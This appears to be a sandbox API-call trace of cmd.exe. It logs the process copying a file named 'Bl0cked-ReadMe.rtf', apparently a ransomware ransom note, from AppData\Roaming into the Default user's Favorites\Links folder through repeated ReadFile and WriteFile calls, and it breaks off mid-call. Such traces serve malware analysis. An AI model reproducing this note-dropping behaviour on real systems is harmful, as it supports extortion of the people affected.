[0210.983] GetFileType (hFile=0x7) returned 0x2 [0210.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.983] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f8b8 | out: lpMode=0x22f8b8) returned 1 [0210.983] _dup (_FileHandle=1) returned 3 [0210.983] _close (_FileHandle=1) returned 0 [0210.984] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0210.984] CreateFileW (lpFileName="C:\\Users\\Default\\FAVORI~1\\Links\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\links\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f888, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0210.985] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0210.985] GetConsoleTitleW (in: lpConsoleTitle=0x22f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.985] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0210.985] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0210.985] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0210.985] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0210.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0210.986] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f21c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f21c) returned 0x2b0e70 [0210.986] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0210.986] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0210.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0210.986] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e128, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0210.987] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] GetFileType (hFile=0x54) returned 0x1 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e180 | out: lpFileSizeHigh=0x22e180*=0x0) returned 0x1632 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.987] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] GetFileType (hFile=0x4c) returned 0x1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] GetFileType (hFile=0x4c) returned 0x1 [0210.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.988] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.989] GetFileType (hFile=0x4c) returned 0x1 [0210.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.989] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.990] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.990] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] GetFileType (hFile=0x4c) returned 0x1 [0210.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.991] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.992] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] GetFileType (hFile=0x4c) returned 0x1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.992] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.993] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] GetFileType (hFile=0x4c) returned 0x1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.993] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.994] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.994] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.994] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.995] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.995] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.995] GetFileType (hFile=0x4c) returned 0x1 [0210.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0a8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f0f8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] WriteFile (in: hFile=0x4c, lpBuffer=0x22f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f148*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.996] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f198*, lpNumberOfBytesWritten=0x22e19c*=0x20, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.997] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e188 | out: lpNewFilePointer=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0210.997] ReadFile (in: hFile=0x54, lpBuffer=0x22efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e1a8, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesRead=0x22e1a8*=0x200, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22efb8*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f008*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, lpOverlapped=0x0 | out: lpBuffer=0x22f058*, lpNumberOfBytesWritten=0x22e19c*=0x50, lpOverlapped=0x0) returned 1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] GetFileType (hFile=0x4c) returned 0x1 [0210.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0210.997] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e19c, 